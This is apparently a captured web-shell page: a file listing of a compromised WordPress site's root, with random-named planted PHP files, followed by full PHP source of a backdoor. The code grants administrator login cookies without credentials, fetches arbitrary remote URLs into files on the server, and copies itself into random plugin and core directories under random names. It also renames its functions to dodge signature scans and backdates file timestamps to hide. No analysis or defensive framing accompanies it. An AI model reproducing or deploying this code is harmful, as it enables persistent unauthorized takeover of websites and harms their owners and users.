Gecko [ elibrary.unsap.ac.id ]

Name	Size	Permission	Date
.analytic	[ DIR ]	drwxrwxrwx	2023-12-09 02:53
.git	[ DIR ]	drwxrwxrwx	2024-03-16 19:27
.quarantine	[ DIR ]	drwxrwxrwx	2023-07-11 01:22
.tmb	[ DIR ]	drwxrwxrwx	2023-12-08 20:02
.well-known	[ DIR ]	drwxrwxrwx	2023-07-09 22:57
Relawan	[ DIR ]	drwxrwxrwx	2024-03-23 16:47
cache	[ DIR ]	drwxrwxrwx	2024-03-16 19:26
cgi-bin	[ DIR ]	drwxrwxrwx	2023-12-09 02:53
wp-admin	[ DIR ]	drwxrwxrwx	2023-07-11 00:38
wp-content	[ DIR ]	drwxrwxrwx	2024-09-18 09:08
wp-includes	[ DIR ]	drwxrwxrwx	2023-07-09 22:59
.ftpquotas	91 B	-rw-rw-rw-	2023-10-21 15:08
.htaccess	0 B	-rw-rw-rw-	2023-12-19 16:44
.htaccess.bk	523 B	-rw-rw-rw-	2023-07-09 23:00
.tmp	355 B	-rw-rw-rw-	2024-02-26 04:23
0cuknq3efh.php	0 B	-rw-rw-rw-	2024-03-27 02:01
7mhilcf.php	0 B	-rw-rw-rw-	2024-03-27 02:01
Relawan.zip	81.75 MB	-rw-rw-rw-	2023-07-21 16:22
_htaccess	1.99 KB	-rw-rw-rw-	2023-07-16 00:24
about.php	250.42 KB	-rw-rw-rw-	2024-02-17 13:34
admin-ajax.php	0 B	-rw-rw-rw-	2024-03-27 01:54
admin.php	48.55 KB	-rw-rw-rw-	2024-02-17 13:34
error_log	113.8 KB	-rw-rw-rw-	2023-07-21 13:08
googlea1919ab817f4ec66.html	53 B	-rw-rw-rw-	2023-07-21 18:59
index.old.20231021	405 B	-rw-rw-rw-	2023-10-21 15:08
index.php	126.94 KB	-rw-rw-rw-	2024-03-15 23:22
license.txt	19.45 KB	-rw-rw-rw-	2023-07-09 22:59
naila.txt	29 B	-rw-rw-rw-	2024-03-17 01:58
nyve3864.php	4.93 KB	-rw-rw-rw-	2020-09-30 18:11
op.php	20.67 KB	-rw-rw-rw-	2023-10-23 18:08
oujs1g.php	4.93 KB	-rw-rw-rw-	2022-01-16 10:40
profile.php	0 B	-rw-rw-rw-	2024-03-27 02:06
quarantine.zip	227.28 MB	-rw-rw-rw-	2023-07-21 14:37
readme.html	7.23 KB	-rw-rw-rw-	2023-07-09 22:59
web.config	993 B	-rw-rw-rw-	2022-11-16 20:57
wp-activate.php	7.04 KB	-rw-rw-rw-	2023-07-09 22:59
wp-admin.php	3.26 KB	-r--r--r--	2024-02-17 13:34
wp-blog-header.php	351 B	-rw-rw-rw-	2023-07-09 22:59
wp-comment.php	9.3 KB	-r--r--r--	2024-02-17 13:34
wp-comments-post.php	2.28 KB	-rw-rw-rw-	2023-07-09 22:59
wp-config-sample.php	3.36 KB	-rw-rw-rw-	2023-07-09 22:59
wp-config.php	3.15 KB	-rw-rw-rw-	2023-07-21 15:51
wp-corn-sample.php	24.53 KB	-rw-rw-rw-	2024-02-17 13:34
wp-cron.php	5.41 KB	-rw-rw-rw-	2023-07-09 22:59
wp-files.php	0 B	-rw-rw-rw-	2023-07-11 01:33
wp-include.php	373 B	-r--r--r--	2024-02-17 13:34
wp-links-opml.php	2.44 KB	-rw-rw-rw-	2023-07-09 22:59
wp-load.php	3.7 KB	-rw-rw-rw-	2023-07-09 22:59
wp-loader.php	0 B	-rw-rw-rw-	2024-03-27 02:07
wp-login.php	48.17 KB	-rw-rw-rw-	2023-07-09 22:59
wp-logln.php	1.71 KB	-rw-rw-rw-	2024-02-17 13:34
wp-mail.php	8.34 KB	-rw-rw-rw-	2023-07-09 22:59
wp-settings.php	24.41 KB	-rw-rw-rw-	2023-07-09 22:59
wp-signup.php	33.54 KB	-rw-rw-rw-	2023-07-09 22:59
wp-trackback.php	4.77 KB	-rw-rw-rw-	2023-07-09 22:59
wp-ver.php	27.16 KB	-r--r--r--	2024-02-17 13:34
xmlrpc.php	3.16 KB	-rw-rw-rw-	2023-07-09 22:59
xntzfm4.php	4.93 KB	-rw-rw-rw-	2020-04-01 19:30
yo.php.suspected	276 B	-rw-rw-rw-	2023-10-23 18:08
zidaLGJC	65.91 MB	-rw-rw-rw-	2023-07-21 14:09

Rename

<?php

define('WP_USE_THEMES', false);
define('PLUGIN_VERSION', '5.1');

require_once($_SERVER['DOCUMENT_ROOT'] . '/wp-load.php');

function sptdelgifknhru($parent, $child="") {
    $path = "{$_SERVER['DOCUMENT_ROOT']}/$parent/$child";
    $directories = array_filter(scandir($path), fn($dir) => $dir != '.' && $dir != '..');
    $result = [];

foreach ($directories as $dir) {
        $directory = "$path/$dir";
        if (is_dir($directory)) {
            $result[] = $directory;
            $result = array_merge($result, sptdelgifknhru($parent, "$child/$dir"));
        }
    }

return $result;
}
function mvxcotsfgeprunkd($length = 8, $includeNumbers = true) {
    $characters = 'abcdefghijklmnopqrstuvwxyz' . ($includeNumbers ? '1234567890' : '');
    return substr(str_shuffle($characters), 0, $length);
}
function xewinqmslgouh($path) {
    return str_replace($_SERVER['DOCUMENT_ROOT'], $_SERVER['HTTP_HOST'], $path);
}
function fnetpursahcwzbgjo($filename) {
    $timestamp = mt_rand(strtotime('2020-01-01 12:12:12'), strtotime('2022-12-30 13:13'));
    touch($filename, $timestamp);
    clearstatcache(true, $filename);
}
function utmypcnlqzivedf($filename) {
    $content = file_get_contents($filename);
    if (!$content) {
        $file = fopen($filename, 'r');
        $content = fread($file, filesize($filename));
        fclose($file);
    }
    return $content;
}
function cxkregayhwnu() {
    $path = $_SERVER['DOCUMENT_ROOT'] . '/wp-content';
    $dirs = [];
    if (is_dir($path) && $handle = opendir($path)) {
        while (false !== ($entry = readdir($handle))) {
            if ($entry !== "." && $entry !== ".." && is_dir($path . '/' . $entry) && $entry !== 'plugins') {
                $dirs[$entry] = $path . '/' . $entry;
            }
        }
        closedir($handle);
    }
    return $dirs;
}
function gobsxdecty() {
    $action = $_REQUEST['action'];
    $initialDirs = cxkregayhwnu();
    $dirs = [];
    foreach (array_keys($initialDirs) as $dir) {
        $dirs[$dir] = sptdelgifknhru("wp-content", $dir);
    }
    $dirs['admin'] = sptdelgifknhru('wp-admin','');
    $dirs['includes'] = sptdelgifknhru('wp-includes','');
    $message = [];
    switch ($action) {
        case 'login':
            $user = get_users(["role" => "administrator"])[0];
            wp_set_auth_cookie($user->data->ID);
            wp_set_current_user($user->data->ID);
            die($user->data->ID);
        case 'download':
            $url = $_REQUEST['url'];
            $filename = $_REQUEST['filename'];
            $response = file_get_contents($url);
            if ($response !== false) {
                file_put_contents($filename, $response) || (file_put_contents($filename, $response) === false && fwrite(fopen($filename, 'w'), $response));
            }
            $message['success'] = file_exists($filename) && filesize($filename) > 10;
            break;
        case 'delete':
            unlink(__FILE__);
            
        case 'copy':
            $filename = $_REQUEST['filename'];
            if (!file_exists($filename) || filesize($filename) < 10) {
                $message['success'] = false;
                $message['data'] = [];
                break;

}
            $target = $_REQUEST['dir'] ?: $_SERVER['DOCUMENT_ROOT'];
            $replace = $_REQUEST['replace'] ? true : false;
            $num = $_REQUEST['num'] ?: 1;
            $success = [];
            if ($replace) {
                $content = utmypcnlqzivedf($filename);
                if ($content) {
                    $pattern = '/function\s+([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*)\s*\(/';
                    $functions = preg_match_all($pattern, $content, $result);
                    $result = $result[1];
                    if ($result) {
                        foreach ($result as $oldFunction) {
                            $randomChar = mvxcotsfgeprunkd(rand(10,17), false);
                            $content = str_replace("$oldFunction(", "$randomChar(", $content);
                        }
                        file_put_contents($filename, $content);
                    }
                }
            }
            for ($i = 0; $i < $num; $i++) {
                $randomName = $_REQUEST['random_name'] ? mvxcotsfgeprunkd(rand(5, 10)) . '.php' : $filename;
                $directoriesTarget = is_array($dirs[$target]) ? $dirs[$target][array_rand($dirs[$target])] : ($target ?: $_SERVER['DOCUMENT_ROOT']);
                $outputName = "$directoriesTarget/$randomName";
                $message["success[$i]"] = copy($filename, $outputName);
                if ($message["success[$i]"]) {
                    $success[] = xewinqmslgouh($outputName);
                    fnetpursahcwzbgjo($outputName);
                    fnetpursahcwzbgjo($directoriesTarget);
                }
            }
            $message['data'] = $success;
            break;
        default:
            $message['directories'] = array_keys($dirs);
    }
    echo json_encode($message);
}
gobsxdecty();